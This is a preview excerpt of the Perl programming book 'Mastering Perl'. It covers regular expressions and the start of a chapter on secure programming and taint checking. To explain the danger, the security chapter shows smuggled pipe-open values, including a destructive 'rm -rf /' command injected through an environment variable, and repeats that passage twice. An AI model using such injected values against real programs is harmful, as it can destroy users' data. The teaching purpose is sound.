Mastering Perl

By brian d foy
Foreword by Randal L. Schwartz
Book Price: $39.99 USD
£24.99 GBP
PDF Price: $31.99



Table of Contents

Chapter 1: Introduction: Becoming a Master
This book isn’t going to make you a Perl master; you have to do that for yourself by programming a lot of Perl, trying a lot of new things, and making a lot of mistakes. I’m going to help you get on the right path. The road to mastery is one of self-reliance and independence. As a Perl master, you’ll be able to answer your own questions as well as those of others.
In the golden age of guilds, craftsmen followed a certain path, both literally and figuratively, as they mastered their craft. They started as apprentices and would do the boring bits of work until they had enough skill to become the more trusted journeymen. The journeyman had greater responsibility but still worked under a recognized master. When he had learned enough of the craft, the journeyman would produce a “master work” to prove his skill. If other masters deemed it adequately masterful, the journeyman became a recognized master himself.
The journeymen and masters also traveled (although people disagree on whether that’s where the “journey” part of the name came from) to other masters, where they would learn new techniques and skills. Each master knew things the others didn’t, perhaps deliberately guarding secret methods, or knew it in a different way. Part of a journeyman’s education was learning from more than one master.
Interactions with other masters and journeymen continued the master’s education. He learned from those masters with more experience and learned from himself as he taught journeymen, who also taught him because they brought skills they learned from other masters.
The path an apprentice followed affected what he learned. An apprentice who studied with more masters was exposed to many more perspectives and ways of teaching, all of which he could roll into his own way of doing things. Odd teachings from one master could be exposed by another, giving the apprentice a balanced view on things. Additionally, although the apprentice might be studying to be a carpenter or a mason, different masters applied those skills to different goals, giving the apprentice a chance to learn different applications and ways of doing things.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
What It Means to Be a Master
This book takes a different tone from Learning Perl and Intermediate Perl, which we designed as tutorial books. Those mostly cover the details of the Perl language and only a little on the practice of programming. Mastering Perl, however, puts more responsibility on you, the reader.
Now that you’ve made it this far in Perl, you’re working on your ability to answer your own questions and figure out things on your own, even if that’s a bit more work than simply asking someone. Doing it yourself builds your experience and keeps you from annoying your coworkers.
Although I don’t cover other languages in this book, as Advanced Perl Programming, First Edition, by Sriram Srinivasan (O’Reilly) and Mastering Regular Expressions by Jeffrey Friedl (O’Reilly) do, you should learn some other languages. Doing so informs your Perl knowledge and gives you new perspectives, some that make you appreciate Perl more and others that help you understand its limitations.
And, as a master, you will run into Perl’s limitations. I like to say that if you don’t have a list of five things you hate about Perl and the facts to back them up, you probably haven’t done enough Perl. It’s not really Perl’s fault. You’ll get that with any language. The mastery comes in by knowing these things and still choosing Perl because its strengths outweigh its weaknesses for your application. You’re a master because you know both sides of the problem and can make an informed choice that you can explain to others.
All of that means that becoming a master involves work, reading, and talking to other people. The more you do, the more you learn. There’s no shortcut to mastery. You may be able to learn the syntax quickly, as in any other language, but that will be the tiniest portion of your experience. Now that you know most of Perl, you’ll probably spend your time reading some of the “meta”-programming books that discuss the practice of programming rather than just slinging syntax. Those books will probably use a language that’s not Perl, but I’ve already said you need to learn some other languages, if only to be able to read these books. As a master, you’re always learning.
Who Should Read This Book
I wrote this book as a successor to Intermediate Perl, which covered the basics of references, objects, and modules. I’ll assume that you already know and feel comfortable with those features. Where possible, I make references to Intermediate Perl in case you need to refresh your skills on a topic.
If you’re coming directly from another language and haven’t used Perl yet, or have only used it lightly, you might want to skim Learning Perl and Intermediate Perl to get the basics of the language. Still, you might not recognize some of the idioms that come with experience and practice. I don’t want to tell you not to buy this book (hey, I need to pay my mortgage!), but you might not get the full value I intend, at least not right away.
How to Read This Book
I’m not writing a third volume of “Yet More Perl Features.” I want to teach you how to learn Perl on your own. I’m setting you on your own path to mastery, and as an apprentice, you’ll need to do some work on your own. Sometimes this means I’ll show you where in the Perl documentation to get the answers (meaning I can use the saved space to talk about other topics).
What Should You Know Already?
I’ll presume that you already know everything that we covered in Learning Perl and Intermediate Perl. By we, I mean the Stonehenge Consulting Services crew and bestselling Perl coauthors Randal Schwartz, Tom Phoenix, and me.
Most importantly, you should know these subjects, each of which implies knowledge of other subjects:
  • Using Perl modules
  • Writing Perl modules
  • References to variables, subroutines, and filehandles
  • Basic regular expression syntax and workings
  • Object-oriented Perl
If I want to discuss something not in either of those books, I’ll explain it in a bit more depth. Even if we did cover it in the previous books, I might cover it again just because it’s that important.
What I Cover
After learning the basic syntax of Perl in Learning Perl and the basics of modules and team programming in Intermediate Perl, the next things you need to learn are the idioms of Perl and how to integrate the skills that you already have to create robust and scalable applications that other people can use without your help.
I’ll cover some subjects you’ve seen in those two books, but in more depth. As we said in Learning Perl, we sometimes told white lies to simplify the details and to get you going as soon as possible without getting bogged down. Now it’s time to get a bit dirty in the bogs.
Don’t mistake my coverage of a subject for an endorsement, though. There are millions of Perl programmers in the world, and each has her own way of doing things. Part of becoming a Perl master involves reading quite a bit of Perl even if you wouldn’t write that Perl yourself. I’ll endeavor to tell you when I think you shouldn’t do something, but that’s really just my opinion. As you strive to be a good programmer, you’ll need to know more than you’ll use. Sometimes I’ll show things that I don’t want you to use but that I know you’ll see in code from other people. Oh well, it’s not a perfect world.
Not all programming is about adding or adjusting features in code. Sometimes it’s pulling code apart to inspect it and watch it do its magic. Other times it’s about getting rid of code that you don’t need. The practice of programming is more than creating applications. It’s also about managing and wrangling code. Some of the techniques I’ll show are for analysis, not your own development.
What I Don’t Cover
As I talked over the idea of this book with the editors, we decided not to duplicate the subjects more than adequately covered by other books. You need to learn from other masters, too, and I don’t really want to take up more space on your shelf than I really need. Ignoring those subjects gives me the double bonus of not writing those chapters and using that space for other things. You should already have read those other books anyway.
That doesn’t mean that you get to ignore those subjects, though, and where appropriate I’ll point you to the right book. Elsewhere in this book, I list some books I think you should add to your library as you move toward Perl mastery. Those books are by other Perl masters, each of whom has something to teach you. At the end of most chapters I point you toward other resources as well. A master never stops learning.
Since you’re already here, though, I’ll just give you the list of topics I’m explicitly avoiding, for whatever reason: Perl internals, embedding Perl, threads, best practices, object-oriented programming, source filters, and dolphins. This is a dolphin-safe book.
Chapter 2: Advanced Regular Expressions
Regular expressions, or just regexes, are at the core of Perl’s text processing, and certainly are one of the features that made Perl so popular. All Perl programmers pass through a stage where they try to program everything as regexes and, when that’s not challenging enough, everything as a single regex. Perl’s regexes have many more features than I can, or want to, present here, so I include those advanced features I find most useful and expect other Perl programmers to know about without referring to perlre, the documentation page for regexes.
References to Regular Expressions
I don’t have to know every pattern at the time that I code something. Perl allows me to interpolate variables into regexes. I might hard code those values, take them from user input, or get them in any other way I can get or create data. Here’s a tiny Perl program to do grep’s job. It takes the first argument from the command line and uses it as the regex in the while statement. That’s nothing special (yet); we showed you how to do this in Learning Perl. I can use the string in $regex as my pattern, and Perl compiles it when it interpolates the string in the match operator:
#!/usr/bin/perl
# perl-grep.pl

my $regex = shift @ARGV;

print "Regex is [$regex]\n";

while( <> )
        {
        print if m/$regex/;
        }
I can use this program from the command line to search for patterns in files. Here I search for the pattern new in all of the Perl programs in the current directory:
% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
                [ qr/\G(\n)/,                "newline"     ],
                                                { ( $1, "newline char"     ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;
What happens if I give it an invalid regex? I try it with a pattern that has an opening parenthesis without its closing mate:
$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/ 
        at ./perl-grep.pl line 10, <> line 1.
When I interpolate the regex in the match operator, Perl compiles the regex and immediately complains, stopping my program. To catch that, I want to compile the regex before I try to use it.
The qr// is a regex quoting operator that stores my regex in a scalar (and as a quoting operator, its documentation shows up in perlop). The qr// compiles the pattern so it’s ready to use when I interpolate $regex in the match operator. I wrap the eval operator around the qr// to catch the error, even though I end up die-ing anyway:
#!/usr/bin/perl
# perl-grep2.pl

my $pattern = shift @ARGV;

my $regex = eval { qr/$pattern/ };
die "Check your pattern! $@" if $@;

while( <> )
        {
        print if m/$regex/;
        }
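The same eval-and-qr// idea extends to checking several patterns without dying on the first bad one. The following is only a sketch under stated assumptions: the helper name compile_pattern and the two sample patterns are made up for illustration and do not come from the book. The helper returns the compiled regex on success, or undef plus the error text on failure, so the caller decides what to do next:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# compile_pattern is a hypothetical helper for this sketch.
# It returns ( $regex, undef ) on success or ( undef, $error ) on failure.
sub compile_pattern
        {
        my( $pattern ) = @_;

        # qr// compiles at runtime here because $pattern is interpolated,
        # so eval can trap the error from an invalid pattern
        my $regex = eval { qr/$pattern/ };
        return ( undef, $@ ) unless defined $regex;

        return ( $regex, undef );
        }

foreach my $pattern ( 'new', '(perl' )
        {
        my( $regex, $error ) = compile_pattern( $pattern );

        if( defined $regex )
                {
                print "[$pattern] compiled\n";
                }
        else
                {
                print "[$pattern] is not a valid regex\n";
                }
        }
```

Returning the error instead of calling die is a design choice for the sketch; a command-line tool such as perl-grep2.pl may reasonably prefer to stop right away.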
Noncapturing Grouping, (?:PATTERN)
Parentheses in regexes don’t have to trigger memory. I can use them simply for grouping by using the special sequence (?:PATTERN). This way, I don’t get unwanted data in my capturing groups.
Perhaps I want to match the names on either side of one of the conjunctions and or or. In @strings I have some strings that express pairs. The conjunction may change, so in my regex I use the alternation and|or. My problem is precedence. Alternation has lower precedence than sequence, so without grouping, (\S+) and|or (\S+) means either (\S+) and or or (\S+). I need to enclose the alternation in parentheses, (\S+) (and|or) (\S+), to make it work:
#!/usr/bin/perl

my @strings = (
        "Fred and Barney",
        "Gilligan or Skipper",
        "Fred and Ginger",
        );

foreach my $string ( @strings )
        {
        # $string =~ m/(\S+) and|or (\S+)/; # doesn't work
        $string =~ m/(\S+) (and|or) (\S+)/;

        print "\$1: $1\n\$2: $2\n\$3: $3\n";
        print "-" x 10, "\n";
        }
The output shows me an unwanted consequence of grouping the alternation: the part of the string in the parentheses shows up in the memory variables as $2. That’s an artifact.
Table: Unintended match memories

Not grouping and|or     Grouping and|or
$1: Fred                $1: Fred
$2:                     $2: and
$3:                     $3: Barney
----------              ----------
$1:                     $1: Gilligan
$2: Skipper             $2: or
$3:                     $3: Skipper
----------              ----------
$1: Fred                $1: Fred
$2:                     $2: and
$3:                     $3: Ginger
----------              ----------
Using the parentheses solves my precedence problem, but now I have that extra memory variable. That gets in the way when I change the program to use a match in list context. All the memory variables, including the conjunction, show up in @names:
# extra element!
my @names = ( $string =~ m/(\S+) (and|or) (\S+)/ );
I want to simply group things without triggering memory. Instead of the regular parentheses I just used, I add ?: right after the opening parenthesis of the group, which turns them into noncapturing parentheses. Instead of (and|or), I now have (?:and|or). This form doesn’t trigger the memory variables, and it doesn’t count toward their numbering either. I can apply quantifiers to it just as I can to plain parentheses. Now I don’t get my extra element in @names.
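As a minimal sketch of the noncapturing form in a list-context match, the following reuses the sample strings from the earlier program. The helper name pair_names is made up for this illustration:

```perl
#!/usr/bin/perl
use strict;
use warnings;

my @strings = (
        "Fred and Barney",
        "Gilligan or Skipper",
        "Fred and Ginger",
        );

# pair_names is a hypothetical helper for this sketch
sub pair_names
        {
        my( $string ) = @_;

        # (?:and|or) groups the alternation without capturing it,
        # so only the two (\S+) groups come back in list context
        my @names = ( $string =~ m/(\S+) (?:and|or) (\S+)/ );

        return @names;
        }

foreach my $string ( @strings )
        {
        my @names = pair_names( $string );
        print scalar( @names ), " names: @names\n";
        }
```

Each string should report two names, with the conjunction left out of the list.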
Readable Regexes, /x and (?#...)
Regular expressions have a well-deserved reputation for being hard to read. Regexes have their own terse language that uses as few characters as possible to represent virtually infinite numbers of possibilities, and that’s just counting the parts that most people use every day.
Luckily for other people, Perl gives me the opportunity to make my regexes much easier to read. Given a little bit of formatting magic, not only will others be able to figure out what I’m trying to match, but a couple of weeks later, so will I. We touched on this lightly in Learning Perl, but it’s such a good idea that I’m going to say more about it. It’s also in Perl Best Practices by Damian Conway (O’Reilly).
When I add the /x flag to either the match or substitution operators, Perl ignores literal whitespace in the pattern. This means that I can spread out the parts of my pattern to make the pattern more discernible. Gisle Aas’s HTTP::Date module parses a date by trying several different regexes. Here’s one of his regular expressions, although I’ve modified it to appear on a single line, wrapped to fit on this page:
/^(\d\d?)(?:\s+|[-\/])(\w+)(?:\s+|[-\/])↲
(\d+)(?:(?:\s+|:)(\d\d?):(\d\d)(?::(\d\d))↲
?)?\s*([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)?\s*(?:\(\w+\))?\s*$/
Quick: Can you tell which one of the many date formats that parses? Me neither. Luckily, Gisle uses the /x flag to break apart the regex and add comments to show me what each piece of the pattern does. With /x, Perl ignores literal whitespace and Perl-style comments inside the regex. Here’s Gisle’s actual code, which is much easier to understand:
        /^
         (\d\d?)               # day
            (?:\s+|[-\/])
         (\w+)                 # month
            (?:\s+|[-\/])
         (\d+)                 # year
         (?:
               (?:\s+|:)       # separator before clock
            (\d\d?):(\d\d)     # hour:min
            (?::(\d\d))?       # optional seconds
         )?                    # optional clock
                \s*
         ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
                \s*
         (?:\(\w+\))?          # ASCII representation of timezone in parens.
                \s*$
        /x
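The same layout works for much smaller patterns. This sketch is not from HTTP::Date: the pattern, the variable names, and the sample date are assumptions made up to show /x with comments on a year-month-day string:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# A made-up pattern for dates such as 2007-07-16
my $date_regex = qr/
        ^
        (\d{4})         # year
        -
        (\d\d)          # month
        -
        (\d\d)          # day
        $
        /x;

my $string = '2007-07-16';

# in list context the match returns the three captured pieces
if( my( $year, $month, $day ) = $string =~ $date_regex )
        {
        print "Year: $year Month: $month Day: $day\n";
        }
```

Under /x, a literal space or # in the pattern has to be escaped or placed in a character class, since Perl otherwise treats it as formatting or the start of a comment.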
Global Matching
In Learning Perl we told you about the /g flag that you can use to make all possible substitutions, but it’s more useful than that. I can use it with the match operator, where it does different things in scalar and list context. We told you that the match operator returns true if it matches and false otherwise. That’s still true (we wouldn’t have lied to you), but it’s not just a boolean value. The list context behavior is the most useful. With the /g flag, the match operator returns all of the memory matches:
$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"
Even though I only have one set of memory parentheses in my regular expression, it makes as many matches as it can. Once it makes a match, Perl starts where it left off and tries again. I’ll say more on that in a moment. I often run into another Perl idiom that’s closely related to this, in which I don’t want the actual matches, but just a count:
my $word_count = () = /(\S+)/g;
This uses a little-known but important rule: the result of a list assignment is the number of elements in the list on the right side. In this case, that’s the number of elements the match operator returns. This only works for a list assignment, which is assigning from a list on the right side to a list on the left side. That’s why I have the extra () in there.
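A short sketch of the difference the empty list makes, using the same sample string. The variable name $matched is an assumption added for the comparison:

```perl
#!/usr/bin/perl
use strict;
use warnings;

$_ = "Just another Perl hacker,";

# the list assignment to (), evaluated in scalar context, gives
# the number of elements the match operator returned
my $word_count = () = /(\S+)/g;

# without the empty list, the match itself is in scalar context
# and only reports whether it succeeded
my $matched = /(\S+)/g;

print "Word count: $word_count\n";
print "Matched: ", ( $matched ? 'yes' : 'no' ), "\n";
```

The sample string has four runs of nonwhitespace characters, so the count comes out as 4, while the plain scalar assignment only records success.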
In scalar context, the /g flag does some extra work we didn’t tell you about earlier. During a successful match, Perl remembers its position in the string, and when I match against that same string again, Perl starts where it left off in that string. It returns the result of one application of the pattern to the string:
$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"

while( /(\S+)/g ) # scalar context
        {
        print "Next word is '$1'\n";
        }
When I match against that same string again, Perl gets the next match:
Next word is 'Just'
Next word is 'another'
Next word is 'Perl'
Next word is 'hacker,'
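I can even look at the match position as I go along. The built-in pos() function returns the position where the last /g match on a string left off (it uses $_ by default).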
Lookarounds
Lookarounds are arbitrary anchors for regexes. We showed several anchors in Learning Perl, such as ^, $, and \b, and I just showed the \G anchor. Using a lookaround, I can describe my own anchor as a regex, and just like the other anchors, they don’t count as part of the pattern or consume part of the string. They specify a condition that must be true, but they don’t add to the part of the string that the overall pattern matches.
Lookarounds come in two flavors: lookaheads that look ahead to assert a condition immediately after the current match position, and lookbehinds that look behind to assert a condition immediately before the current match position. This sounds simple, but it’s easy to misapply these rules. The trick is to remember that it anchors to the current match position and then figure out on which side it applies.
Both lookaheads and lookbehinds have two types: positive and negative. The positive lookaround asserts that its pattern has to match. The negative lookaround asserts that its pattern doesn’t match. No matter which I choose, I have to remember that they apply to the current match position, not anywhere else in the string.
Lookahead assertions let me peek at the string immediately ahead of the current match position. The assertion doesn’t consume part of the string, and if it succeeds, matching picks up right after the current match position.
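To make the "doesn’t consume" point concrete, here is a small sketch with a made-up sample string. It records where the match ended by reading the first element of the built-in @+ array, which holds the offset just past the end of the overall match:

```perl
#!/usr/bin/perl
use strict;
use warnings;

my $string = "Perl hacker";

# positive lookahead: "Perl" must be followed by " hacker",
# but " hacker" is not part of what the pattern matched
my( $matched ) = $string =~ m/(Perl)(?= hacker)/;
my $end        = $+[0];

print "Matched [$matched], and the match ended at offset $end\n";

# negative lookahead: "Perl" must not be followed by " novice"
print "No novice here\n" if $string =~ m/Perl(?! novice)/;
```

The match ends at offset 4, right after Perl, even though the assertion looked at the seven characters that follow.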

Positive lookahead assertions

In Learning Perl, we included an exercise to check for both “Fred” and “Wilma” on the same line of input, no matter the order they appeared on the line. The trick we wanted to show to the novice Perler is that two regexes can be simpler than one. One way to do this repeats both Wilma and Fred in the alternation so I can try either order. A second try separates them into two regexes:
#!/usr/bin/perl
# fred-and-wilma.pl

$_ = "Here come Wilma and Fred!";
print "Matches: $_\n" if /Fred.*Wilma|Wilma.*Fred/;
print "Matches: $_\n" if /Fred/ && /Wilma/;
I can make a simple, single regex using a positive lookahead assertion.
Deciphering Regular Expressions
While trying to figure out a regex, whether one I found in someone else’s code or one I wrote myself (maybe a long time ago), I can turn on Perl’s regex debugging mode. Perl’s -D switch turns on debugging options for the Perl interpreter (not for your program). The switch takes a series of letters or numbers to indicate what it should turn on. The -Dr option turns on regex parsing and execution debugging.
I can use a short program to examine a regex. The first argument is the match string and the second argument is the regular expression. I save this program as explain-regex:
#!/usr/bin/perl

$ARGV[0] =~ /$ARGV[1]/;
When I try this with the target string Just another Perl hacker, and the regex Just another (\S+) hacker,, I see two major sections of output, which the perldebguts documentation explains at length. First, Perl compiles the regex, and the -Dr output shows how Perl parsed the regex. It shows the regex nodes, such as EXACT and NSPACE, as well as any optimizations, such as anchored "Just another ". Second, it tries to match the target string, and shows its progress through the nodes. It’s a lot of information, but it shows me exactly what it’s doing:
$ perl -Dr explain-regex 'Just another Perl hacker,' 'Just another (\S+) hacker,'
Omitting $` $& $' support.

EXECUTING...

Compiling REx `Just another (\S+) hacker,'
size 15 Got 124 bytes for offset annotations.
first at 1
rarest char k at 4
rarest char J at 0
   1: EXACT <Just another >(6)
   6: OPEN1(8)
   8:   PLUS(10)
   9:     NSPACE(0)
  10: CLOSE1(12)
  12: EXACT < hacker,>(15)
  15: END(0)
anchored "Just another " at 0 floating " hacker," at 14..2147483647 (checking anchored) minlen 22
Offsets: [15]
                1[13] 0[0] 0[0] 0[0] 0[0] 14[1] 0[0] 17[1] 15[2] 18[1] 0[0] 19[8] 0[0] 0[0] 27[0]
Guessing start of match, REx "Just another (\S+) hacker," against "Just another Perl hacker,"...
Found anchored substr "Just another " at offset 0...
Found floating substr " hacker," at offset 17...
Guessed: match at offset 0
Matching REx "Just another (\S+) hacker," against "Just another Perl hacker,"
  Setting an EVAL scope, savestack=3
   0 <> <Just another>    |  1:  EXACT <Just another >
  13 <ther > <Perl ha>    |  6:  OPEN1
  13 <ther > <Perl ha>    |  8:  PLUS
                                                   NSPACE can match 4 times out of 2147483647...
  Setting an EVAL scope, savestack=3
  17 < Perl> < hacker>    | 10:    CLOSE1
  17 < Perl> < hacker>    | 12:    EXACT < hacker,>
  25 <Perl hacker,> <>    | 15:    END
Match successful!
Freeing REx: `"Just another (\\S+) hacker,"'
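The -D switch needs a perl binary built with debugging support. The re pragma gives similar output from inside a program, and the Further Reading section mentions it as re 'debug'. The following is a sketch only: the variable names are made up, and it assumes a reasonably recent Perl in which the pragma is lexically scoped. The debugging output goes to standard error:

```perl
#!/usr/bin/perl
use strict;
use warnings;

my $string = 'Just another Perl hacker,';
my $type;

        {
        # only the regex compiled inside this block is traced
        use re 'debug';

        # copy the capture out, since $1 is restored on leaving the block
        ( $type ) = $string =~ m/Just another (\S+) hacker,/;
        }

print "The type of hacker is [$type]\n" if defined $type;
```

Keeping the pragma inside a bare block limits the trace to the one pattern under study.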
Final Thoughts
It’s almost the end of the chapter, but there are still so many regular expression features I find useful. Consider this section a quick tour of the things you can look into on your own.
I don’t have to be content with the simple character classes such as \w (word characters), \d (digits), and the others denoted by slash sequences. I can also use the POSIX character classes. I enclose the class name in square brackets with colons on both sides of the name, and I put that whole thing inside a bracketed character class:
print "Found alphabetic character!\n" if  $string =~ m/[[:alpha:]]/;
print "Found hex digit!\n"            if  $string =~ m/[[:xdigit:]]/;
I negate those with a caret, ^, after the first colon. A negated class matches any single character that isn’t in the class:
print "Found non-alphabetic character!\n" if  $string =~ m/[[:^alpha:]]/;
print "Found non-space character!\n"      if  $string =~ m/[[:^space:]]/;
I can say the same thing in another way by specifying a named property. The \p{Name} sequence (little p) includes the characters for the named property, and the \P{Name} sequence (big P) is its complement:
print "Found ASCII character!\n"    if  $string =~ m/\p{IsASCII}/;
print "Found control characters!\n" if  $string =~ m/\p{IsCntrl}/;

print "Found non-punctuation character!\n" if  $string =~ m/\P{IsPunct}/;
print "Found non-uppercase character!\n"   if  $string =~ m/\P{IsUpper}/;
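A quick way to check what these classes really match is to try them on known strings. In this sketch the sample strings and variable names are made up. It also shows that a negated class only finds one character outside the class, so asserting that a whole string lacks alphabetic characters takes an anchored pattern:

```perl
#!/usr/bin/perl
use strict;
use warnings;

my $string = "Perl 5";

# POSIX classes go inside a bracketed character class
my $has_alpha     = $string =~ m/[[:alpha:]]/  ? 1 : 0;
my $has_non_alpha = $string =~ m/[[:^alpha:]]/ ? 1 : 0;

# the property forms work the same way: little p includes, big P excludes
my $has_upper     = $string =~ m/\p{IsUpper}/ ? 1 : 0;
my $has_non_upper = $string =~ m/\P{IsUpper}/ ? 1 : 0;

# to say that no character at all is alphabetic, anchor both ends
my $no_alpha_at_all = "12345" =~ m/\A[[:^alpha:]]*\z/ ? 1 : 0;

print "Has alphabetic: $has_alpha\n";
print "Has non-alphabetic: $has_non_alpha\n";
print "Has uppercase: $has_upper\n";
print "Has non-uppercase: $has_non_upper\n";
print "12345 has no alphabetic characters: $no_alpha_at_all\n";
```

All five checks come out true for these samples: "Perl 5" holds characters both inside and outside each class, and "12345" holds no letters.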
The Regexp::Common module provides pretested and known-to-work regexes for, well, common things such as web addresses, numbers, postal codes, and even profanity. It gives me a multilevel hash %RE whose values are regexes. If I don’t like that, I can use its function interface:
use Regexp::Common qw(RE_ALL); # RE_ALL asks for the RE_* functions too

print "Found a real number\n" if $string =~ /$RE{num}{real}/;

print "Found a real number\n" if $string =~ RE_num_real();
If I want to build up my own pattern, I can use Regexp::English, which uses a series of chained methods to return an object that stands in for a regex. It’s probably not something you want in a real program, but it’s fun to think about:
use Regexp::English;

my $regexp = Regexp::English->new
        ->literal( 'Just' )
                ->whitespace_char
        ->word_chars
                ->whitespace_char
        ->remember( \$type_of_hacker )
        ->word_chars
        ->end
                ->whitespace_char
        ->literal( 'hacker' );

$regexp->match( 'Just another Perl hacker,' );

print "The type of hacker is [$type_of_hacker]\n";
Summary
This chapter covered some of the more useful advanced features of Perl’s regex engine. The qr() quoting operator lets me compile a regex for later and gives it back to me as a reference. With the special (?) sequences, I can make my regular expression much more powerful, as well as less complicated. The \G anchor allows me to anchor the next match where the last one left off, and using the /c flag, I can try several possibilities without resetting the match position if one of them fails.
Further Reading
perlre is the documentation for Perl regexes, and perlretut gives a regex tutorial. Don’t confuse that with perlreftut, the tutorial on references. To make it even more complicated, perlreref is the regex quick reference.
The details for regex debugging show up in perldebguts. It explains the output of -Dr and re 'debug'.
Perl Best Practices has a section on regexes, and gives the /x “Extended Formatting” pride of place.
Mastering Regular Expressions covers regexes in general, and compares their implementation in different languages. Jeffrey Friedl has an especially nice description of lookahead and lookbehind operators. If you really want to know about regexes, this is the book to get.
Simon Cozens explains advanced regex features in two articles for Perl.com: “Regexp Power” (http://www.perl.com/pub/a/2003/06/06/regexps.html) and “Power Regexps, Part II” (http://www.perl.com/pub/a/2003/07/01/regexps.html).
The web site http://www.regular-expressions.info has good discussions about regular expressions and their implementations in different languages.
Chapter 3: Secure Programming Techniques
I can’t control how people run my programs or what input they give it, and given the chance, they’ll do everything I don’t expect. This can be a problem when my program tries to pass on that input to other programs. When I let just anyone run my programs, like I do with CGI programs, I have to be especially careful. Perl comes with features to help me protect myself against that, but they only work if I use them, and use them wisely.
If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:
open my($fh), $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do things such as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:
my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG};
How can that cause problems? Look at the Perl documentation for open. Have you ever read all of the 400-plus lines of that entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page. Several of those ways involve opening a pipe to another program:
open my($fh), "wc -l *.pod |";

open my($fh), "| mail joe@example.com";
To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:
$ perl program.pl "| mail joe@example.com"

$ FOO_CONFIG="rm -rf / |" perl program
This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone can eventually get to the point where she can compromise the system.
There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Bad Data Can Ruin Your Day
If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:
open my($fh), $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do things such as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:
my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG};
How can that cause problems? Look at the Perl documentation for open. Have you ever read all of the 400-plus lines of that entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page. Several of those ways involve opening a pipe to another program:
open my($fh), "wc -l *.pod |";

open my($fh), "| mail joe@example.com";
To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:
$ perl program.pl "| mail joe@example.com"

$ FOO_CONFIG="rm -rf / |" perl program
This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone can eventually get to the point where she can compromise the system.
There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything open can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.
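As a minimal sketch of one such measure, I can use the three-argument form of open, which keeps the mode separate from the filename so that a leading or trailing | is just another character in the name. The helper name open_for_reading and the sample input are hypothetical, chosen only for illustration:

```perl
use strict;
use warnings;

# Hypothetical helper: open $file for reading only, never as a pipe.
sub open_for_reading {
    my( $file ) = @_;

    # Three-argument open: the mode is its own argument, so Perl treats
    # $file as a literal filename even if it contains | or > characters.
    open my $fh, '<', $file
        or return;

    return $fh;
}

# This string would start a pipe with the two-argument open. Here Perl
# only looks for a file with that odd name.
my $name = 'echo pwned |';
my $fh   = open_for_reading( $name );
print "[$name]: ", ( $fh ? 'opened as a file' : 'not opened' ), "\n";
```

This does not validate the filename at all; it only removes open’s habit of interpreting special characters in it, so I still have to check what the user gave me.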
Taint Checking
Configuration is all about reaching outside the program to get data. When users choose the input, they can choose what the program does. This is more important when I write programs for other people to use. I can trust myself to give my own program the right data (usually), but other users, even those with the purest of intentions, might get it wrong.
Under taint checking, Perl doesn’t let me use unchecked data from outside the source code to affect things outside the program. Perl will stop my program with an error. Before I show more, though, understand that taint checking does not prevent bad things from happening. It merely helps me track down areas where some bad things might happen and tells me to fix those.
When I turn on taint checking with the -T switch, Perl marks any data that come from outside the program as tainted, or insecure, and Perl won’t let me use those data to interact with anything outside of the program. This way, I can avoid several security problems that come with communicating with other processes. This is all or nothing. Once I turn it on, it applies to the whole program and all of the data.
Perl sets up taint checking at compile time, and it affects the entire program for the entirety of its run. Perl has to see this option very early to allow it to work. I can put it in the shebang line in this toy program that uses the external command echo to print a message:
#!/usr/bin/perl -T

system qq|echo "Args are @ARGV"|;
Taint checking works just fine as long as I run the command directly. The operating system uses the shebang line to figure out which interpreter to run and which switches to pass to it. Perl catches the insecurity of the PATH. By using only a program name, system uses the PATH setting. Users can set that to anything they like before they run my program, and I’ve allowed outside data to influence the working of the program. When I run the program, Perl realizes that the PATH string is tamper-able, so it stops my program and reminds me about its insecurity.
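A minimal sketch of the remedy that perlsec suggests is to replace the inherited PATH with a value I choose myself and to drop a few other variables that shells consult. The helper name clean_environment and the particular directories are assumptions for illustration; the right PATH depends on the system:

```perl
use strict;
use warnings;

# Hypothetical helper: make the environment something I chose, not
# something the user handed me.
sub clean_environment {
    # Assumed directories; list only the ones the program really needs.
    $ENV{PATH} = '/bin:/usr/bin';

    # Variables that some shells consult, as listed in perlsec.
    delete @ENV{ qw(IFS CDPATH ENV BASH_ENV) };

    return;
}

clean_environment();
print "PATH is now [$ENV{PATH}]\n";
```

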